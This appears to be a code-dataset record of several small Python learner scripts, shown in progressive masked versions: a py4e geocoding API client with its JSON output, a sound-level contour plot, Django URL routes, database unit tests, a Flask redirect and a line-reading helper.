"formatted_address": "Champaign, IL, USA",
"geometry": {
"location": {
"lat": 40.1019523,
"lng": -88.2271615
},
"location_type": "GEOMETRIC_CENTER",
"viewport": {
"northeast": {
"lat": 40.1033012802915,
"lng": -88.22581251970848
},
"southwest": {
"lat": 40.1006033197085,
"lng": -88.2285104802915
}
}
},
"place_id": "ChIJ6VUmqSTXDIgR-iZoBCUFPKU",
"plus_code": {
"compound_code": "4Q2F+Q4 Champaign, Champaign City Township, IL, United States",
"global_code": "86GH4Q2F+Q4"
},
"types": [
"establishment",
"point_of_interest",
"university"
]
}
],
"status": "OK"
}
Place id ChIJ6VUmqSTXDIgR-iZoBCUFPKU
'''
|
normal
|
{
"blob_id": "d34159536e860719094a36cfc30ffb5fcae72a9a",
"index": 296,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Retriving', url)\n<mask token>\nprint('Retrived', len(data), 'characters')\n<mask token>\nprint(json.dumps(js, indent=4))\nprint('Place id', js['results'][0]['place_id'])\n<mask token>\n",
"step-3": "<mask token>\ntarget = 'http://py4e-data.dr-chuck.net/json?'\nlocal = input('Enter location: ')\nurl = target + urllib.parse.urlencode({'address': local, 'key': 42})\nprint('Retriving', url)\ndata = urllib.request.urlopen(url).read()\nprint('Retrived', len(data), 'characters')\njs = json.loads(data)\nprint(json.dumps(js, indent=4))\nprint('Place id', js['results'][0]['place_id'])\n<mask token>\n",
"step-4": "import urllib.error, urllib.request, urllib.parse\nimport json\ntarget = 'http://py4e-data.dr-chuck.net/json?'\nlocal = input('Enter location: ')\nurl = target + urllib.parse.urlencode({'address': local, 'key': 42})\nprint('Retriving', url)\ndata = urllib.request.urlopen(url).read()\nprint('Retrived', len(data), 'characters')\njs = json.loads(data)\nprint(json.dumps(js, indent=4))\nprint('Place id', js['results'][0]['place_id'])\n<mask token>\n",
"step-5": "#API End Points by Mitul\nimport urllib.error, urllib.request, urllib.parse\nimport json\n\ntarget = 'http://py4e-data.dr-chuck.net/json?'\nlocal = input('Enter location: ')\nurl = target + urllib.parse.urlencode({'address': local, 'key' : 42})\n\nprint('Retriving', url)\ndata = urllib.request.urlopen(url).read()\nprint('Retrived', len(data), 'characters')\njs = json.loads(data)\nprint(json.dumps(js, indent = 4))\nprint('Place id', js['results'][0]['place_id'])\n\n\n'''Output:\nEnter location: >? UIUC\nRetriving http://py4e-data.dr-chuck.net/json?address=UIUC&key=42\nRetrived 1720 characters\n{\n \"results\": [\n {\n \"access_points\": [],\n \"address_components\": [\n {\n \"long_name\": \"Champaign\",\n \"short_name\": \"Champaign\",\n \"types\": [\n \"locality\",\n \"political\"\n ]\n },\n {\n \"long_name\": \"Champaign County\",\n \"short_name\": \"Champaign County\",\n \"types\": [\n \"administrative_area_level_2\",\n \"political\"\n ]\n },\n {\n \"long_name\": \"Illinois\",\n \"short_name\": \"IL\",\n \"types\": [\n \"administrative_area_level_1\",\n \"political\"\n ]\n },\n {\n \"long_name\": \"United States\",\n \"short_name\": \"US\",\n \"types\": [\n \"country\",\n \"political\"\n ]\n }\n ],\n \"formatted_address\": \"Champaign, IL, USA\",\n \"geometry\": {\n \"location\": {\n \"lat\": 40.1019523,\n \"lng\": -88.2271615\n },\n \"location_type\": \"GEOMETRIC_CENTER\",\n \"viewport\": {\n \"northeast\": {\n \"lat\": 40.1033012802915,\n \"lng\": -88.22581251970848\n },\n \"southwest\": {\n \"lat\": 40.1006033197085,\n \"lng\": -88.2285104802915\n }\n }\n },\n \"place_id\": \"ChIJ6VUmqSTXDIgR-iZoBCUFPKU\",\n \"plus_code\": {\n \"compound_code\": \"4Q2F+Q4 Champaign, Champaign City Township, IL, United States\",\n \"global_code\": \"86GH4Q2F+Q4\"\n },\n \"types\": [\n \"establishment\",\n \"point_of_interest\",\n \"university\"\n ]\n }\n ],\n \"status\": \"OK\"\n}\nPlace id ChIJ6VUmqSTXDIgR-iZoBCUFPKU\n'''\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 25 13:34:46 2017
@author: Sven Geboers
"""
from math import pi,e
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
def LevelToIntensity(NoiseLevelIndB):
    I0 = 10.**(-12) #This is the threshold hearing intensity, matching 0 dB
NoiseLevel = float(NoiseLevelIndB)
Intensity = I0*10**(NoiseLevel/10)
return Intensity
def IntensityToLevel(Intensity):
    I0 = 10.**(-12) #This is the threshold hearing intensity, matching 0 dB
Intensity = Intensity
NoiseLevelIndB = 10*np.log10(Intensity/I0)
return NoiseLevelIndB
#Define the mathematical function coth(x)
coth = lambda x: (e**(x)+e**(-x))/(e**(x)-e**(-x)) #np.cosh(x)/np.sinh(x)
#Closes all previous plots so that we don't have to click them away manually
plt.close('all')
#Defining some constants:
SLHighway10 = 53.5 #dB, this is the sound level of a highway at 10 m distance
d1 = 10. #m, distance between the highway and the sound barrier
#Creating data mesh
b = np.arange(0.1, 150, 0.5)
d = np.arange(0.1, 150, 0.5)
b, d = np.meshgrid(b, d)
#Calculating maximum velocity and individual sound power
Vmax = 9.25 #m/s
IntensityTurbine40cm = lambda V: 4*10**(-6)*e**(0.2216*V)
IntensityIndividualTurbine = IntensityTurbine40cm(Vmax)
PowerIndividual = IntensityIndividualTurbine*pi*0.16 * 4
SoundPowerHighway = LevelToIntensity(SLHighway10)*pi*d1**2 * 4
#Calculating intensity and sound level
Intensity = PowerIndividual/(4*b*d)*coth(d/b*pi)+SoundPowerHighway/(4*pi*(d+d1)**2)
SL = IntensityToLevel(Intensity)
#Plots contour curve
levels = [41.,47.] #Contour levels that will be shown
fig = plt.figure()
CS = plt.contourf(d, b, SL, levels,cmap=cm.Greys)
cbar=plt.colorbar()
cbar.set_label('Sound level in dB', rotation=270)
plt.xlabel('Distance (m)')
plt.ylabel('Spacing (m)')
plt.title('Sound level as a function of distance and spacing \n with a velocity of 9.25 m/s for WM6', fontweight='bold')
plt.minorticks_on()
plt.grid(b=True, which='major',linewidth=2)
plt.grid(b=True, which='minor')
plt.show()
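# Added sanity check (sketch): the exponential form of coth above should
# agree with numpy's cosh/sinh ratio for any x != 0.
_x = np.array([0.5, 1.0, 2.0])
assert np.allclose(coth(_x), np.cosh(_x) / np.sinh(_x))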
|
normal
|
{
"blob_id": "68a1d5a77abd19aece04bd560df121ceddccea42",
"index": 3179,
"step-1": "<mask token>\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\n<mask token>\nplt.close('all')\n<mask token>\ncbar.set_label('Sound level in dB', rotation=270)\nplt.xlabel('Distance (m)')\nplt.ylabel('Spacing (m)')\nplt.title(\n \"\"\"Sound level in function of distance and spacing \n with a velocity of 9.25 m/s for WM6\"\"\"\n , fontweight='bold')\nplt.minorticks_on()\nplt.grid(b=True, which='major', linewidth=2)\nplt.grid(b=True, which='minor')\nplt.show()\n",
"step-3": "<mask token>\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\ncoth = lambda x: (e ** x - e ** -x) / (e ** x - e ** -x)\nplt.close('all')\nSLHighway10 = 53.5\nd1 = 10.0\nb = np.arange(0.1, 150, 0.5)\nd = np.arange(0.1, 150, 0.5)\nb, d = np.meshgrid(b, d)\nVmax = 9.25\nIntensityTurbine40cm = lambda V: 4 * 10 ** -6 * e ** (0.2216 * V)\nIntensityIndividualTurbine = IntensityTurbine40cm(Vmax)\nPowerIndividual = IntensityIndividualTurbine * pi * 0.16 * 4\nSoundPowerHighway = LevelToIntensity(SLHighway10) * pi * d1 ** 2 * 4\nIntensity = PowerIndividual / (4 * b * d) * coth(d / b * pi\n ) + SoundPowerHighway / (4 * pi * (d + d1) ** 2)\nSL = IntensityToLevel(Intensity)\nlevels = [41.0, 47.0]\nfig = plt.figure()\nCS = plt.contourf(d, b, SL, levels, cmap=cm.Greys)\ncbar = plt.colorbar()\ncbar.set_label('Sound level in dB', rotation=270)\nplt.xlabel('Distance (m)')\nplt.ylabel('Spacing (m)')\nplt.title(\n \"\"\"Sound level in function of distance and spacing \n with a velocity of 9.25 m/s for WM6\"\"\"\n , fontweight='bold')\nplt.minorticks_on()\nplt.grid(b=True, which='major', linewidth=2)\nplt.grid(b=True, which='minor')\nplt.show()\n",
"step-4": "<mask token>\nfrom math import pi, e\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\ncoth = lambda x: (e ** x - e ** -x) / (e ** x - e ** -x)\nplt.close('all')\nSLHighway10 = 53.5\nd1 = 10.0\nb = np.arange(0.1, 150, 0.5)\nd = np.arange(0.1, 150, 0.5)\nb, d = np.meshgrid(b, d)\nVmax = 9.25\nIntensityTurbine40cm = lambda V: 4 * 10 ** -6 * e ** (0.2216 * V)\nIntensityIndividualTurbine = IntensityTurbine40cm(Vmax)\nPowerIndividual = IntensityIndividualTurbine * pi * 0.16 * 4\nSoundPowerHighway = LevelToIntensity(SLHighway10) * pi * d1 ** 2 * 4\nIntensity = PowerIndividual / (4 * b * d) * coth(d / b * pi\n ) + SoundPowerHighway / (4 * pi * (d + d1) ** 2)\nSL = IntensityToLevel(Intensity)\nlevels = [41.0, 47.0]\nfig = plt.figure()\nCS = plt.contourf(d, b, SL, levels, cmap=cm.Greys)\ncbar = plt.colorbar()\ncbar.set_label('Sound level in dB', rotation=270)\nplt.xlabel('Distance (m)')\nplt.ylabel('Spacing (m)')\nplt.title(\n \"\"\"Sound level in function of distance and spacing \n with a velocity of 9.25 m/s for WM6\"\"\"\n , fontweight='bold')\nplt.minorticks_on()\nplt.grid(b=True, which='major', linewidth=2)\nplt.grid(b=True, which='minor')\nplt.show()\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 25 13:34:46 2017\r\n\r\n@author: Sven Geboers\r\n\"\"\"\r\n\r\nfrom math import pi,e\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n\r\ndef LevelToIntensity(NoiseLevelIndB):\r\n I0 = 10.**(-12) #This is the treshold hearing intensity, matching 0 dB\r\n NoiseLevel = float(NoiseLevelIndB)\r\n Intensity = I0*10**(NoiseLevel/10)\r\n return Intensity\r\n \r\ndef IntensityToLevel(Intensity):\r\n I0 = 10.**(-12) #This is the treshold hearing intensity, matching 0 dB\r\n Intensity = Intensity\r\n NoiseLevelIndB = 10*np.log10(Intensity/I0)\r\n return NoiseLevelIndB\r\n \r\n#Definine the mathematical function coth(x)\r\ncoth = lambda x: (e**(x)-e**(-x))/(e**(x)-e**(-x)) #np.cosh(x)/np.sinh(x)\r\n\r\n#Closes all previous plots so that we don't have to click them away manually\r\nplt.close('all')\r\n\r\n#Defining some constants:\r\nSLHighway10 = 53.5 #dB, this is the sound level of a highway at 10 m distance\r\nd1 = 10. #m, distance between the highway and the sound barrier\r\n\r\n#Creating data mesh \r\nb = np.arange(0.1, 150, 0.5)\r\nd = np.arange(0.1, 150, 0.5)\r\nb, d = np.meshgrid(b, d)\r\n\r\n#Calculating maximum velocity and individual sound power\r\nVmax = 9.25 #m/s\r\nIntensityTurbine40cm = lambda V: 4*10**(-6)*e**(0.2216*V)\r\nIntensityIndividualTurbine = IntensityTurbine40cm(Vmax)\r\nPowerIndividual = IntensityIndividualTurbine*pi*0.16 * 4\r\nSoundPowerHighway = LevelToIntensity(SLHighway10)*pi*d1**2 * 4\r\n\r\n#Calculating intensity and sound level\r\nIntensity = PowerIndividual/(4*b*d)*coth(d/b*pi)+SoundPowerHighway/(4*pi*(d+d1)**2)\r\nSL = IntensityToLevel(Intensity)\r\n\r\n#Plots contour curve \r\nlevels = [41.,47.] #Contour levels that will be shown\r\nfig = plt.figure()\r\nCS = plt.contourf(d, b, SL, levels,cmap=cm.Greys)\r\ncbar=plt.colorbar()\r\ncbar.set_label('Sound level in dB', rotation=270)\r\nplt.xlabel('Distance (m)')\r\nplt.ylabel('Spacing (m)')\r\nplt.title('Sound level in function of distance and spacing \\n with a velocity of 9.25 m/s for WM6',fontweight='bold')\r\nplt.minorticks_on()\r\nplt.grid(b=True, which='major',linewidth=2)\r\nplt.grid(b=True, which='minor') \r\nplt.show()\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=
'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,
name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,
name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=
'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,
name='edit-user'), url('^', views.index, name='index')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=
'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,
name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,
name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=
'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,
name='edit-user'), url('^', views.index, name='index')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'),
url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'),
url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'),
url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'),
url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'),
# url(r'^add-host', views.add_host, name='add-host'),
url(r'^', views.index, name='index'),
]
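# Added note (hypothetical modernization, not part of the original file):
# Django >= 2.0 spells the same table with re_path, e.g.
#   from django.urls import re_path
#   urlpatterns = [re_path(r'^class/([^/]+)/?$', views.puppet_class,
#                          name='puppet-class'), ...]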
|
flexible
|
{
"blob_id": "add56d52f3c88f814a166d12c3bc5a5906268864",
"index": 484,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=\n 'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,\n name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,\n name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=\n 'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,\n name='edit-user'), url('^', views.index, name='index')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=\n 'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,\n name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,\n name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=\n 'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,\n name='edit-user'), url('^', views.index, name='index')]\n",
"step-4": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'),\n url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'),\n url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'),\n url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'),\n url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'),\n # url(r'^add-host', views.add_host, name='add-host'),\n url(r'^', views.index, name='index'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Reference: https://docs.python.org/2/library/unittest.html
import unittest
import sys
sys.path.append('..')
from database_utils import DatabaseUtils
class Test_DatabaseUtils(unittest.TestCase):
def setUp(self):
self.db=DatabaseUtils()
def dataCount(self):
with self.db.connection.cursor() as cursor:
cursor.execute("select count(*) from LmsUser")
return cursor.fetchone()[0]
def test_getUser(self):
count = self.dataCount()
try:
trueResult=self.db.getUser("username")
print("Test passed")
except:
print("Test failed")
def test_insertBookTransaction(self):
testData=(1,1,"2019-01-01","abc")
result=self.db.insertBookTransaction(testData[0],testData[1],testData[2],testData[3])
print("result: ",result)
self.assertTrue(result)
def test_updateBookStatus(self):
testData=(1,"anything")
result=self.db.updateBookStatus(testData[1],testData[0])
self.assertFalse(result)
def test_updateBookTransaction(self):
testData=(1,"anything","2019-01-01")
result=self.db.updateBookTransaction(testData[0],testData[1],testData[2])
self.assertFalse(result)
def test_searchBooks(self):
result=self.db.searchBooks("abc")
self.assertFalse(result)
result=self.db.searchBooks("Harry")
self.assertTrue(result)
def test_searchBooksAuthur(self):
result=self.db.searchBooksAuthur("abc")
self.assertFalse(result)
result=self.db.searchBooksAuthur("gavin")
self.assertTrue(result)
def test_searchBooksISBN(self):
result=self.db.searchBooksISBN(1)
self.assertFalse(result)
def test_listBooks(self):
result=self.db.listBooks()
self.assertTrue(result)
def test_getBook(self):
result=self.db.getBook(1)
self.assertTrue(result)
def test_getBookISBN(self):
result=self.db.getBookISBN(1)
self.assertFalse(result)
def test_listReturnBooks(self):
result=self.db.listReturnBooks(1)
self.assertTrue(result)
def test_getReturnBook(self):
result=self.db.getReturnBook(1,1)
self.assertTrue(result)
if __name__ == "__main__":
unittest.main()
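# Added note: a single case can be run from the shell without editing this
# file (module name assumed here; substitute the actual file name), e.g.
#   python -m unittest test_database_utils.Test_DatabaseUtils.test_listBooks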
|
normal
|
{
"blob_id": "ff8e8af72a8eb97a392fcfec5960eed7a2e51f68",
"index": 9211,
"step-1": "<mask token>\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n <mask token>\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n <mask token>\n <mask token>\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n <mask token>\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n <mask token>\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n <mask token>\n <mask token>\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n <mask token>\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result = self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n <mask token>\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n\n def test_insertBookTransaction(self):\n testData = 1, 1, '2019-01-01', 'abc'\n result = self.db.insertBookTransaction(testData[0], testData[1],\n testData[2], testData[3])\n print('result: ', result)\n self.assertTrue(result)\n\n def test_updateBookStatus(self):\n testData = 1, 'anything'\n result = self.db.updateBookStatus(testData[1], testData[0])\n self.assertFalse(result)\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n\n def test_searchBooks(self):\n result = self.db.searchBooks('abc')\n self.assertFalse(result)\n result = self.db.searchBooks('Harry')\n self.assertTrue(result)\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result = self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\n<mask token>\n",
"step-4": "import unittest\nimport sys\nsys.path.append('..')\nfrom database_utils import DatabaseUtils\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n\n def dataCount(self):\n with self.db.connection.cursor() as cursor:\n cursor.execute('select count(*) from LmsUser')\n return cursor.fetchone()[0]\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n\n def test_insertBookTransaction(self):\n testData = 1, 1, '2019-01-01', 'abc'\n result = self.db.insertBookTransaction(testData[0], testData[1],\n testData[2], testData[3])\n print('result: ', result)\n self.assertTrue(result)\n\n def test_updateBookStatus(self):\n testData = 1, 'anything'\n result = self.db.updateBookStatus(testData[1], testData[0])\n self.assertFalse(result)\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n\n def test_searchBooks(self):\n result = self.db.searchBooks('abc')\n self.assertFalse(result)\n result = self.db.searchBooks('Harry')\n self.assertTrue(result)\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result = self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n\n def test_listReturnBooks(self):\n result = self.db.listReturnBooks(1)\n self.assertTrue(result)\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "# Reference: https://docs.python.org/2/library/unittest.html\nimport unittest\nimport sys\nsys.path.append('..')\nfrom database_utils import DatabaseUtils\n\nclass Test_DatabaseUtils(unittest.TestCase):\n def setUp(self):\n self.db=DatabaseUtils()\n \n def dataCount(self):\n with self.db.connection.cursor() as cursor:\n cursor.execute(\"select count(*) from LmsUser\")\n return cursor.fetchone()[0]\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult=self.db.getUser(\"username\")\n print(\"Test passed\")\n except:\n print(\"Test failed\")\n\n def test_insertBookTransaction(self):\n testData=(1,1,\"2019-01-01\",\"abc\")\n result=self.db.insertBookTransaction(testData[0],testData[1],testData[2],testData[3])\n print(\"result: \",result)\n self.assertTrue(result)\n\n def test_updateBookStatus(self):\n testData=(1,\"anything\")\n result=self.db.updateBookStatus(testData[1],testData[0])\n self.assertFalse(result)\n\n def test_updateBookTransaction(self):\n testData=(1,\"anything\",\"2019-01-01\")\n result=self.db.updateBookTransaction(testData[0],testData[1],testData[2])\n self.assertFalse(result)\n \n def test_searchBooks(self):\n result=self.db.searchBooks(\"abc\")\n self.assertFalse(result)\n result=self.db.searchBooks(\"Harry\")\n self.assertTrue(result)\n \n def test_searchBooksAuthur(self):\n result=self.db.searchBooksAuthur(\"abc\")\n self.assertFalse(result)\n result=self.db.searchBooksAuthur(\"gavin\")\n self.assertTrue(result)\n \n def test_searchBooksISBN(self):\n result=self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result=self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result=self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result=self.db.getBookISBN(1)\n self.assertFalse(result)\n\n def test_listReturnBooks(self):\n result=self.db.listReturnBooks(1)\n self.assertTrue(result)\n\n def test_getReturnBook(self):\n result=self.db.getReturnBook(1,1)\n self.assertTrue(result)\n\nif __name__ == \"__main__\":\n unittest.main()",
"step-ids": [
9,
10,
13,
17,
18
]
}
|
[
9,
10,
13,
17,
18
] |
from flask import render_template, url_for, escape, redirect, abort
from app import core
from database import db
@core.route('/post')
@core.route('/categorie')
@core.route('/tag')
def returnToHome():
return redirect(url_for('home'))
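# Added sketch (assumes `core` is a Flask app; if it is a Blueprint, use the
# registering app's test client instead): each route should answer with a
# 302 redirect toward the 'home' endpoint.
#   with core.test_client() as client:
#       assert client.get('/post').status_code == 302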
|
normal
|
{
"blob_id": "c27d6279d1ea84bab3c0abd4ca9a08de202219da",
"index": 1748,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/post')\[email protected]('/categorie')\[email protected]('/tag')\ndef returnToHome():\n return redirect(url_for('home'))\n",
"step-3": "from flask import render_template, url_for, escape, redirect, abort\nfrom app import core\nfrom database import db\n\n\[email protected]('/post')\[email protected]('/categorie')\[email protected]('/tag')\ndef returnToHome():\n return redirect(url_for('home'))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def assert_number(arg):
if not isinstance(arg, (int, float)):
raise TypeError(f"Expected number, got {type(arg)}")
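# Added usage sketch. Note that bool is a subclass of int in Python, so
# assert_number(True) passes; exclude bool explicitly if that matters.
assert_number(3.14)           # accepted
try:
    assert_number("3.14")     # rejected
except TypeError as err:
    print(err)                # Expected number, got <class 'str'>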
|
normal
|
{
"blob_id": "2de62c73507acac597d70557adfe8286e2f28a1f",
"index": 5569,
"step-1": "<mask token>\n",
"step-2": "def assert_number(arg):\n if not isinstance(arg, (int, float)):\n raise TypeError(f'Expected number, got {type(arg)}')\n",
"step-3": "def assert_number(arg):\n if not isinstance(arg, (int, float)):\n raise TypeError(f\"Expected number, got {type(arg)}\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
while ch != '\n':
line += ch
ch = get_char()
if ch == '':
return line
next_c = 0
limit = 0
line += '\n'
return line
<|reserved_special_token_1|>
<|reserved_special_token_0|>
next_c = 0
limit = 0
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
while ch != '\n':
line += ch
ch = get_char()
